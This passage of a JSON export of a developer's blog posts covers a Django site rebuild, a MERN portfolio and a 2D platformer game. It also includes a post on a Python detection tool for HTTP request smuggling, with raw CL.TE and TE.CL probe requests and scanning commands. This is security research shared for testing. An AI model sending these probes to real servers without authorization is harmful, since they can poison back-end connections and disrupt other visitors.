string\">'django.template.context_processors.debug'</span><span class=\"token punctuation\">,</span>\n                <span class=\"token string\">'django.template.context_processors.request'</span><span class=\"token punctuation\">,</span>\n                <span class=\"token string\">'django.contrib.auth.context_processors.auth'</span><span class=\"token punctuation\">,</span>\n                <span class=\"token string\">'django.contrib.messages.context_processors.messages'</span><span class=\"token punctuation\">,</span>\n            <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">]</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">Please refer to Django official documentation of the Templates for further understanding.</font><br></div><div><ul><li><font size=\"4\"><a href=\"https://docs.djangoproject.com/en/3.2/topics/templates/\"><font color=\"#dd4124\">Django Templates</font></a><br></font></li></ul><div><br></div><div><font size=\"4\">Django is a very well structured, high-level python web framework that provides a complete suite for full-stack web development to build the website faster, secure and more scalable, so that's why I choose this framework to rebuild the HackbotOne website.</font><br></div></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">HackbotOne Architecture</font></b><br></div><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><font size=\"4\">The HackbotOne microservices built using <a href=\"https://www.django-rest-framework.org/\"><font color=\"#dd4124\">django-rest-framework</font></a>, and there are three different services developed to store and retrieve the data.</font></div><div><ol><li><font size=\"4\"><a href=\"https://api.hackbotone.com/api/v1/blogs/list?page=1\"><font color=\"#dd4124\">Blogs</font></a><br></font></li><li><font size=\"4\"><a href=\"https://api.hackbotone.com/api/v1/portfolio/me\"><font color=\"#dd4124\">Portfolio</font></a><br></font></li><li><font size=\"4\" color=\"#dd4124\"><a href=\"https://api.hackbotone.com/api/v1/youtube/latest\"><font color=\"#dd4124\">Youtube</font></a></font><br></li></ol><div><font size=\"4\">The Admin panel controls all three microservices and stores data in the <a href=\"https://www.postgresql.org/\"><font color=\"#dd4124\">PostgreSQL</font></a> database. To retrieve the records for all three microservices, <a href=\"https://api.hackbotone.com/api/v1/blogs/list?page=1\"><font color=\"#dd4124\">api.hackbotone.com</font></a> connects to the database returns results for each endpoint and all of these endpoints are publicly accessible over the internet.</font><br></div></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">Open Source</font></b><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">The complete development I have made open-source on my Github, and if you're interested in Django development, I believe hackbotone project work definitely will be helpful on your project. I'll highly encourage you to clone both of the below repositories, and if you find any issues or have any idea feel free to raise an issue.</font></div><div><ul><li><font size=\"4\"><a href=\"https://github.com/anshumanpattnaik/hackbotone-api\"><font color=\"#dd4124\">hackbotone-api</font></a><br></font></li><li><font size=\"4\"><a href=\"https://github.com/anshumanpattnaik/hackbotone-website\"><font color=\"#dd4124\">hackbotone-website</font></a></font><br></li></ul><div><br></div></div><div><font size=\"4\">I hope you found this article helpful, please share this article on&nbsp;</font><span style=\"font-size: large;\">your social media or&nbsp;</span><span style=\"font-size: large;\">developer communities, so others can be benefited by reading this post.</span></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "HTTP Request Smuggling Detection Tool",
            "blog_id": "http-request-smuggling-detection-tool",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-12-20T19:58:00.593382Z",
            "last_updated_date": "2021-09-03T23:37:21.153548Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/http-request-smuggling-detection-tool/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/http-request-smuggling-detection-tool/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/http-request-smuggling-detection-tool/large_thumbnail.png",
            "keywords": [
                "Smuggling",
                "Python",
                "http-desync-attack"
            ],
            "highlights": "HTTP Request Smuggling is very critical and high severity vulnerability and was initially discovered by watchfire back in 2005 and later it got re-discovered by James Kettle - (albinowax) in August 2019 and presented his research at DEF CON 27 &amp; Black-HAT USA. HRS vulnerability allows an attacker to smuggle an ambiguous HTTP-request as second request in one single HTTP-request to bypass the security controls of a website and gain access to unauthorized sensitive data and performs malicious activities. To know more about this vulnerability I'll highly suggest referring James Kettle well-documented research blogs at Portswigger website.",
            "description": "<div><b><font size=\"5\">What is HTTP Request Smuggling?</font></b></div><div><br></div><div><font size=\"4\">HTTP Request Smuggling is very critical and high severity vulnerability and was initially discovered by <a href=\"https://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf\"><font color=\"#dd4124\">watchfire</font></a> back in 2005 and later it got re-discovered by <a href=\"https://twitter.com/albinowax\"><font color=\"#dd4124\">James Kettle - (albinowax)</font></a> in August 2019 and presented his research at <a href=\"https://www.youtube.com/watch?v=w-eJM2Pc0KI\"><font color=\"#dd4124\">DEF CON 27</font></a> &amp; <a href=\"https://www.youtube.com/watch?v=_A04msdplXs\"><font color=\"#dd4124\">Black-HAT USA</font></a>. HRS vulnerability allows an attacker to smuggle an ambiguous HTTP-request as second request in one single HTTP-request to bypass the security controls of a website and gain access to unauthorized sensitive data and performs malicious activities. To know more about this vulnerability I'll highly suggest referring James Kettle well-documented research blogs at PortSwigger website.</font></div><div><font size=\"4\"><br></font></div><div><div style=\"font-size: large;\"><ul><li><a href=\"https://portswigger.net/web-security/request-smuggling\"><font color=\"#dd4124\">https://portswigger.net/web-security/request-smuggling</font></a></li><li><a href=\"https://portswigger.net/web-security/request-smuggling/finding\"><font color=\"#dd4124\">https://portswigger.net/web-security/request-smuggling/finding</font></a></li><li><font color=\"#dd4124\"><a href=\"https://portswigger.net/web-security/request-smuggling/exploiting\" style=\"\"><font color=\"#dd4124\" style=\"\">https://portswigger.net/web-security/request-smuggling/exploiting</font></a></font></li></ul><div><br></div></div><div style=\"font-size: large;\"><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/ANIRMVwyz5o\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div style=\"font-size: large;\"><br></div><div style=\"\"><div style=\"\"><b style=\"\"><font size=\"5\">How to detect HRS vulnerability?</font></b></div><div style=\"font-size: large;\"><br></div><div style=\"\"><font size=\"4\">Based on the earlier research the most common way to detect the HRS vulnerability is to check the application's response time, if the vulnerability exists then there will be a time delay in response. So there are two different ways to detect this vulnerability.</font></div><div style=\"font-size: large;\"><ul><li>CL.TE</li><li>TE.CL</li></ul></div><div style=\"font-size: large;\"><br></div><div style=\"\"><b style=\"\"><font size=\"5\">Detect (CL.TE) using time delay</font></b></div><div style=\"font-size: large;\"><br></div><div style=\"\"><font size=\"4\">To detect (CL.TE) vulnerability in an application you need to smuggle a request like below which causes a delay in response.</font></div><div style=\"\"><br></div></div></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">POST</span> <span class=\"token operator\">/</span> <span class=\"token constant\">HTTP</span><span class=\"token operator\">/</span><span class=\"token number\">1.1</span>\n<span class=\"token maybe-class-name\">Host</span><span class=\"token operator\">:</span> vulnerable<span class=\"token operator\">-</span>website<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\n<span class=\"token maybe-class-name\">Content</span><span class=\"token operator\">-</span><span class=\"token maybe-class-name\">Length</span><span class=\"token operator\">:</span> <span class=\"token number\">5</span>\n<span class=\"token maybe-class-name\">Transfer</span><span class=\"token operator\">-</span><span class=\"token maybe-class-name\">Encoding</span><span class=\"token operator\">:</span>chunked\n\n<span class=\"token number\">1</span>\n<span class=\"token constant\">Z</span>\n<span class=\"token constant\">Q</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">In the above HTTP request the front-end server uses Content-Length header which has a length of 5 which means it will only process the request body up to Z and it won't include Q in the first request and the back-end server uses Transfer-Encoding header which will process the first chunks of request and waits for the next chunks to arrive which causes a delay in response because as per the front-end server's content-length it processed only request body of length 5.</font></div><div><br></div><div><b><font size=\"5\">Detect (TE.CL) using time delay</font></b></div><div><br></div><div><font size=\"4\">To detect (TE.CL) vulnerability in an application you need to smuggle a request like below which causes a delay in response.</font></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">POST</span> <span class=\"token operator\">/</span> <span class=\"token constant\">HTTP</span><span class=\"token operator\">/</span><span class=\"token number\">1.1</span>\n<span class=\"token maybe-class-name\">Host</span><span class=\"token operator\">:</span> vulnerable<span class=\"token operator\">-</span>website<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\n<span class=\"token maybe-class-name\">Content</span><span class=\"token operator\">-</span><span class=\"token maybe-class-name\">Length</span><span class=\"token operator\">:</span> <span class=\"token number\">6</span>\n<span class=\"token maybe-class-name\">Transfer</span><span class=\"token operator\">-</span><span class=\"token maybe-class-name\">Encoding</span><span class=\"token operator\">:</span>chunked\n\n<span class=\"token number\">0</span>\n\n<span class=\"token constant\">G</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">In the above HTTP request, the front-end server uses Transfer-Encoding header and in the request body, it sends 0 followed by which means in the first request it will terminate the request up to 0 and forwards the request and left remaining contents of the request body and the back-end server uses Content-Length header which has a length of 6 which waits for more contents to arrive which causes a delay in response.</font></div><div><br></div><div><b><font size=\"5\">HRS Detection Tool</font></b></div><div><br></div><div><font size=\"4\">By following the portswigger research academy I have developed a detection tool using python and by using the tool we can identify whether the application is vulnerable to (CL.TE) or (TE.CL) and to detect the vulnerability more accurately the tool has built-in payloads which has around <a href=\"https://github.com/anshumanpattnaik/http-request-smuggling/blob/main/payloads.json\"><font color=\"#dd4124\">37 permutes</font></a> and detection payloads for both (CL.TE) and (TE.CL) variants, the tool supports to scan one single URL or multiple URLs. And most importantly it has (--retry) option which means you can retry the same payload based on the retry value, which gives us an option to detect this vulnerability more accurately.</font></div><div><br></div><div><b><font size=\"5\">Needs to follow Security Consent before using this tool</font></b></div><div><br></div><div><font size=\"4\">It's quite important to know some of the legal disclaimers before scanning any of the targets, you should have proper authorization before scanning any of the targets otherwise I suggest do not use this tool to scan an unauthorized target because to detect the vulnerability it sends multiple payloads for multiple times by using (--retry) option which means if something goes wrong then there is a possibility that backend socket might get poisoned with the payloads and any genuine visitors of that particular website might end up seeing the poisoned payload rather seeing the actual content of the website. So I'll highly suggest taking proper precautions before scanning any of the target website otherwise you will face some legal issue.</font></div><div><br></div><div><b><font size=\"5\">How to use this tool?</font></b></div><div><br></div><div><font size=\"4\">To install this tool in your local machine you must have at least Python version 3.x otherwise socket will fail to established SSL connection with the target host.</font></div><div><br></div><div><b><font size=\"5\">Installation</font></b></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">git clone https<span class=\"token operator\">:</span><span class=\"token operator\">/</span><span class=\"token operator\">/</span>github<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span><span class=\"token operator\">/</span>anshumanpattnaik<span class=\"token operator\">/</span>http<span class=\"token operator\">-</span>request<span class=\"token operator\">-</span>smuggling<span class=\"token punctuation\">.</span><span class=\"token property-access\">git</span>\ncd http<span class=\"token operator\">-</span>request<span class=\"token operator\">-</span>smuggling\npip3 install <span class=\"token operator\">-</span>r requirements<span class=\"token punctuation\">.</span><span class=\"token property-access\">txt</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"5\">Options</font></b><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">usage<span class=\"token operator\">:</span> smuggle<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>h<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>u <span class=\"token constant\">URL</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>urls <span class=\"token constant\">URLS</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>t <span class=\"token constant\">TIMEOUT</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>m <span class=\"token constant\">METHOD</span><span class=\"token punctuation\">]</span>\n<span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>r <span class=\"token constant\">RETRY</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token constant\">HTTP</span> <span class=\"token maybe-class-name\">Request</span> <span class=\"token maybe-class-name\">Smuggling</span> vulnerability detection tool\n\noptional arguments<span class=\"token operator\">:</span>\n<span class=\"token operator\">-</span>h<span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>help show <span class=\"token keyword\">this</span> help message and exit\n<span class=\"token operator\">-</span>u <span class=\"token constant\">URL</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>url <span class=\"token constant\">URL</span> <span class=\"token keyword\">set</span> the target url\n<span class=\"token operator\">-</span>urls <span class=\"token constant\">URLS</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>urls <span class=\"token constant\">URLS</span> <span class=\"token keyword\">set</span> list <span class=\"token keyword\">of</span> target urls<span class=\"token punctuation\">,</span> i<span class=\"token punctuation\">.</span><span class=\"token method function property-access\">e</span> <span class=\"token punctuation\">(</span>urls<span class=\"token punctuation\">.</span><span class=\"token property-access\">txt</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">-</span>t <span class=\"token constant\">TIMEOUT</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>timeout <span class=\"token constant\">TIMEOUT</span> <span class=\"token keyword\">set</span> socket timeout<span class=\"token punctuation\">,</span> <span class=\"token keyword module\">default</span> <span class=\"token operator\">-</span> <span class=\"token number\">10</span>\n<span class=\"token operator\">-</span>m <span class=\"token constant\">METHOD</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>method <span class=\"token constant\">METHOD</span> <span class=\"token keyword\">set</span> <span class=\"token constant\">HTTP</span> <span class=\"token maybe-class-name\">Methods</span><span class=\"token punctuation\">,</span> i<span class=\"token punctuation\">.</span><span class=\"token method function property-access\">e</span> <span class=\"token punctuation\">(</span><span class=\"token constant\">GET</span> or <span class=\"token constant\">POST</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token keyword module\">default</span> <span class=\"token operator\">-</span> <span class=\"token constant\">POST</span>\n<span class=\"token operator\">-</span>r <span class=\"token constant\">RETRY</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>retry <span class=\"token constant\">RETRY</span> <span class=\"token keyword\">set</span> the retry count to re<span class=\"token operator\">-</span>execute the payload<span class=\"token punctuation\">,</span> <span class=\"token keyword module\">default</span> <span class=\"token operator\">-</span> <span class=\"token number\">2</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><b><font size=\"5\">Example usage for using this tool</font></b></div><div><br></div><div><b><font size=\"4\">Scan one single&nbsp;</font></b><font size=\"4\"><b>URL</b></font></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">python3 smuggle<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token operator\">-</span>u <span class=\"token punctuation\">[</span><span class=\"token constant\">URL</span><span class=\"token punctuation\">]</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"4\">Scan list of&nbsp;</font></b><font size=\"4\"><b>URLs</b></font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">python3 smuggle<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token operator\">-</span>urls <span class=\"token punctuation\">[</span><span class=\"token maybe-class-name\">URLs</span><span class=\"token punctuation\">.</span><span class=\"token property-access\">txt</span><span class=\"token punctuation\">]</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">The detection payloads for both (CL.TE) and (TE.CL) are quite general and if you feel it requires to modify then you can update the payload in <a href=\"https://github.com/anshumanpattnaik/http-request-smuggling/blob/main/payloads.json#L300\"><font color=\"#dd4124\">payloads.json</font></a> file of detection array.&nbsp;</font><span style=\"font-size: large;\">Time-based HRS detection logic is not always accurate and to confirm the vulnerability I can suggest you to play with <a href=\"https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988\"><font color=\"#dd4124\">burp-suite turbo intruder</font></a> by using your payloads.</span></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">I hope you will find it useful my HRS Detection tool if you have any suggestion or find any issues then feel free to raise an issue in my <a href=\"https://github.com/anshumanpattnaik/http-request-smuggling/\"><font color=\"#dd4124\">GitHub&nbsp;repository</font></a>.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Thank you for reading this post and Happy Hacking :)</font></div></div>",
            "visibility": true,
            "is_featured": true,
            "featured_board": true,
            "featured": "<div><font face=\"Lora, serif\" size=\"4\">The project work is highly appreciated by many <a href=\"https://en.wikipedia.org/wiki/Information_security\"><font color=\"#dd4124\">InfoSec</font></a> communities and featured in their platforms by highlighting the tool implementation to detect CL.TE/TE.CL vulnerability.</font></div><div><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><font face=\"Lora, serif\" size=\"4\"><b style=\"\">Top Mentions</b></font></div><div><ul><li><a href=\"https://www.youtube.com/watch?v=Zi4yjGeHUZE\"><font size=\"4\" color=\"#dd4124\">Pentester Academy TV | HTTP Request Smuggling Detection Tool</font></a><br></li><li><a href=\"https://www.kitploit.com/2021/08/http-request-smuggling-http-request.html\"><font size=\"4\" color=\"#dd4124\">KitPloit - PenTest &amp; Hacking Tools | HTTP Request Smuggling Detection Tool</font></a><br></li><li><a href=\"https://securityonline.info/http-request-smuggling-detection/\"><font color=\"#dd4124\" size=\"4\"><u>SecurityOnline | Penetration Testing Information Security</u></font><font size=\"4\" color=\"#dd4124\">&nbsp;| HTTP Request Smuggling Detection Tool</font></a></li><li><a href=\"https://www.errorsfind.com/http-request-smuggling-detection-tool/17/08/\"><font color=\"#dd4124\" size=\"4\"><u>Errorsfind - Latest Tools, Hacks &amp; Tutorials</u></font><font size=\"4\" color=\"#dd4124\">&nbsp;| HTTP Request Smuggling Detection Tool</font></a></li><li><a href=\"https://reposhub.com/python/working-with-http/anshumanpattnaik-http-request-smuggling.html\"><font color=\"#dd4124\" size=\"4\"><u>ReposHub</u></font><font size=\"4\" color=\"#dd4124\">&nbsp;| HTTP Request Smuggling Detection Tool</font></a></li><li><a href=\"https://blueteam.news/http-request-smuggling-http-request-smuggling-detection-tool/\"><font color=\"#dd4124\" size=\"4\"><u>Blue Team News&nbsp;</u></font><font size=\"4\" color=\"#dd4124\">| HTTP Request Smuggling Detection Tool</font></a></li><li><a href=\"https://kalilinuxtutorials.com/http-request-smuggling/\"><font color=\"#dd4124\" size=\"4\"><u>Kali Linux Tutorials</u></font><font color=\"#dd4124\" size=\"4\"><u>&nbsp;</u></font><font size=\"4\" color=\"#dd4124\">|&nbsp;</font><font color=\"#dd4124\" size=\"4\"><u>Http-Request-Smuggling : HTTP Request Smuggling Detection Tool</u></font></a></li><li><a href=\"https://www.hahwul.com/cullinan/http-request-smuggling/\"><font color=\"#dd4124\" size=\"4\"><u>HAHWUL</u></font><font color=\"#dd4124\" size=\"4\"><u>&nbsp;</u></font><font size=\"4\" color=\"#dd4124\">|&nbsp;</font><font color=\"#dd4124\" size=\"4\"><u>HTTP Request Smuggling</u></font></a></li><li><font color=\"#dd4124\" size=\"4\"><u><a href=\"https://ipfs.fleek.co/ipfs/QmXGeJ9pN5XuSXD9xtqqcy56ZJRXsRyuQFU1ZhMBLA4zsf/hacktricks/pentesting-web/http-request-smuggling/\"><font color=\"#dd4124\">Sapsan Pentesting Notes |&nbsp;HTTP REQUEST SMUGGLING / HTTP DESYNC ATTACK</font></a></u></font><br></li><li><font color=\"#dd4124\" size=\"4\"><u><a href=\"https://kandi.openweaver.com/python/anshumanpattnaik/http-request-smuggling\"><font color=\"#dd4124\">Kandi |&nbsp;HTTP Request Smuggling Detection Tool</font></a></u></font><br></li><li><font color=\"#dd4124\" size=\"4\"><a href=\"https://www.wangan.com/p/7fygf7b0f192fc96\"><font color=\"#dd4124\">Netan | Magic weapon-HTTP request smuggling detection tool</font></a><br></font></li><li><font color=\"#dd4124\" size=\"4\"><a href=\"https://eshielder.com/2021/08/13/request-smuggling-http-request-smuggling-detection-tool/\"><font color=\"#dd4124\"><u>e-Shielder Security News</u>&nbsp;|&nbsp;<u>Request-Smuggling – HTTP Request Smuggling Detection Tool</u></font></a></font></li><li><font face=\"Lora, serif\" size=\"4\"><a href=\"https://twitter.com/nil0x42/status/1340951508297379843\"><font color=\"#dd4124\">Automatically detect HTTP Request Smuggling vulnerabilities on target</font></a> - by <a href=\"https://twitter.com/nil0x42/\"><font color=\"#dd4124\">@nil0x42</font></a></font></li><li><font size=\"4\"><a href=\"https://twitter.com/ptracesecurity/status/1363028873068355586\"><font color=\"#dd4124\">HTTP Request Smuggling Detection Tool</font></a> - by <a href=\"https://twitter.com/ptracesecurity/\"><font color=\"#dd4124\">@ptracesecurity</font></a></font></li><li><font size=\"4\" color=\"#dd4124\"><a href=\"https://pythonrepo.com/repo/anshumanpattnaik-http-request-smuggling\"><font color=\"#dd4124\">PythonRepo | HTTP Request Smuggling Detection Tool</font></a></font></li><li><font size=\"4\" color=\"#dd4124\"><a href=\"https://book.hacktricks.xyz/pentesting-web/http-request-smuggling#tools\"><font color=\"#dd4124\">HackTricks | HTTP Request Smuggling / HTTP Desync Attack</font></a></font></li></ul></div><div><br></div>"
        },
        {
            "title": "My Portfolio | Full Stack MERN Application",
            "blog_id": "my-portfolio-full-stack-mern-application",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-06-24T19:57:51.110159Z",
            "last_updated_date": "2021-06-06T10:36:04.886733Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/my-portfolio-full-stack-mern-application/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/my-portfolio-full-stack-mern-application/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/my-portfolio-full-stack-mern-application/large_thumbnail.png",
            "keywords": [
                "Portfolio",
                "node.js",
                "mongodb"
            ],
            "highlights": "A portfolio site is essential for every software developer to showcase projects and technical skills which demonstrates what you can do based upon your resume, your portfolio will be very much helpful on the job search because the employer can able to see your work and will be easier for them to evaluate your work for the suitable job, nowadays for every software developer is quite essential to maintain a web presence like official GitHub, Twitter account & your website, so that you can reach out developer communities and build a developer network.",
            "description": "<b><font size=\"5\">Why a portfolio site is essential for a Software developer?</font></b><div><b><font size=\"5\"><br></font></b></div><div><font size=\"4\">A portfolio site is essential for every software developer to showcase projects and technical skills which demonstrates what you can do based upon your resume, your portfolio will be very much helpful on the job search because the employer can able to see your work and will be easier for them to evaluate your work for the suitable job, nowadays for every software developer is quite essential to maintain a web presence like official GitHub, Twitter account &amp; your website, so that you can reach out developer communities and build a developer network.</font><br></div><div><font size=\"4\"><br></font></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/nodp9iETm4A\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><div><b><font size=\"5\">Tips to highlight areas on your portfolio</font></b></div><div><br></div><div><font size=\"4\">While building your portfolio website a few things you need to focus on</font></div><div><br></div><div><ul><li><font size=\"4\">Single page application (Don't use templates)</font></li><li><font size=\"4\">Short introduction</font></li><li><font size=\"4\">Top Skills</font></li><li><font size=\"4\">Best projects - (Try not to highlight every single project)</font></li><li><font size=\"4\">Popular blogs - (Top 10/5/3)</font></li><li><font size=\"4\">Contacts</font></li></ul></div><div><br></div><div><font size=\"4\">And always it's quite important to know that don't use templates while building your website because the templates are pre-built all you need to do is change the content of the template and the website will be completed and as a software developer, you shouldn't be using templates as it won't highlight your technical expertise to make a website and also some other may use the same template, so always built your website from scratch to make it unique so that it will reflect your creative skills to the outside world and your work will be appreciated by the developer communities.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">After building your website when you are planning to mention your projects always remember one thing don't mention every single project on your website which are the projects either in production or in GitHub with a well-maintained version controls that you can mention in your portfolio and always make the website as a single page web application so that it will be easier for the employer to know about yourself quickly.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">The same approach I have also followed while building my portfolio site, I have tried to short my introduction, top skills, best projects &amp; my popular blogs, so that it will be easier for everyone to know about myself in a short time.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">My portfolio - <a href=\"https://myportfolio.hackbotone.com/\"><font color=\"#dd4124\"><b>https://myportfolio.hackbotone.com</b></font></a></font></div><div><br></div><div><font size=\"5\"><b>How I built my portfolio site from scratch?</b></font></div><div><br></div><div><font size=\"4\">I have built my site using react.js as a front end, node.js as a back-end, and MongoDB as storage, for better performance I have implemented server-side rendering technique which is a very popular technique for rendering client-side webpage on the server and server will send the complete result to the client, and to bundle the module I have used Webpack which is a module bundler to bundle JavaScript, front-end assets.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">I have made the complete development open-source on my GitHub&nbsp;so that it will be helpful for you while building your portfolio website.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\" color=\"#dd4124\"><b><a href=\"https://github.com/anshumanpattnaik/reactjs-portfolio-mern-website\"><font color=\"#dd4124\">https://github.com/anshumanpattnaik/reactjs-portfolio-mern-website</font></a></b></font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">So this is the overall explanation of this website, I hope you guys understood as of now that why the portfolio side is essential for the software developer if you find any types of issue in my code then please feel free to raise an issue on GitHub.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Thank you &amp; Happy coding :)</font></div></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Forest Assassin 2D Platformer Game",
            "blog_id": "forest-assassin-2d-platformer-game",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-04-30T19:57:14.550509Z",
            "last_updated_date": "2021-06-03T20:03:42.824280Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/forest-assassin-2d-platformer-game/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/forest-assassin-2d-platformer-game/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/forest-assassin-2d-platformer-game/large_thumbnail.png",
            "keywords": [
                "Game Development",
                "Unity3D",
                "HTML5"
            ],
            "highlights": "Forest Assassin is a 2D adventure platformer game with easy controls and fun gameplay, which helps every one to get started, this is a classic platformer game with wonderfully designed characters and world. To complete the game collect all the coins and the trophy try to collect all 100 gold coins to become the highest scorer in this adventurers platformer game, on your way you will face many obstacles and enemies and use your sword to fight with the enemy.",
            "description": "<b><font size=\"5\">Introduction</font></b><div><b><font size=\"5\"><br></font></b></div><div><b style=\"\"><font size=\"6\">F</font></b><font size=\"4\">orest Assassin is a 2D adventure platformer game with easy controls and fun gameplay, which helps every one to get started, this is a classic platformer game with wonderfully designed characters and world. To complete the game collect all the coins and the trophy try to collect all 100 gold coins to become the highest scorer in this adventurers platformer game, on your way you will face many obstacles and enemies and use your sword to fight with the enemy.</font><br></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">How to play the game on desktop browser?</font></b><br></div><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><div><font size=\"4\">To make it easier for the user I have also published as a desktop browser game because people always love to play browser games and the reason is its quick easy no need for any types of installation.&nbsp;</font></div><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">Currently, the game is available at </span><a href=\"https://games.hackbotone.com/forest-assassin/\" style=\"font-size: large;\"><font color=\"#dd4124\"><b>https://games.hackbotone.com/forest-assassin/</b></font></a><span style=\"font-size: large;\"> and it supports all the modern desktop browsers.</span></div></div><div><span style=\"font-size: large;\"><br></span></div><div><ul><li><font size=\"4\">To move use [ A ] [ D ] or arrow keys</font><br></li><li><font size=\"4\">Use [ SPACE ] key to jump<br></font></li><li><font size=\"4\">Use [ W ] key to attack<br></font></li><li><font size=\"4\">To finish the game collect all coins and the trophy<br></font></li></ul><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">How to play the game on Android device?</font></b><br></div></div><div><span style=\"font-size: large;\"><br></span></div><div><div style=\"\"><font size=\"4\">Forest Assassin is also available for Android devices and on the smartphone user will get the feelings of a classic platformer game. So please download the game and share your experience.</font></div><div style=\"\"><b style=\"color: rgb(221, 65, 36); font-size: large;\"><br></b></div><div style=\"\"><b style=\"font-size: large;\"><font color=\"#dd4124\" style=\"\"><font color=\"#dd4124\">&nbsp;<a href=\"https://play.google.com/store/apps/details?id=com.forestassassin\" style=\"\"><font color=\"#dd4124\">https://play.google.com/store/apps/details?id=com.forestassassin</font></a></font></font></b><br></div></div><div style=\"\"><b style=\"font-size: large;\"><font color=\"#dd4124\" style=\"\"><br></font></b></div><div style=\"\"><ul><li><font size=\"4\">To move use [ LEFT ] &amp; [ RIGHT ] arrow button</font><br></li><li><font size=\"4\">Use [ UP ] arrow button to jump<br></font></li><li><font size=\"4\">Use [ SWORD ] button to attack<br></font></li><li><font size=\"4\">To finish the game collect all coins and the trophy<br></font></li></ul><div><font size=\"4\"><br></font></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" 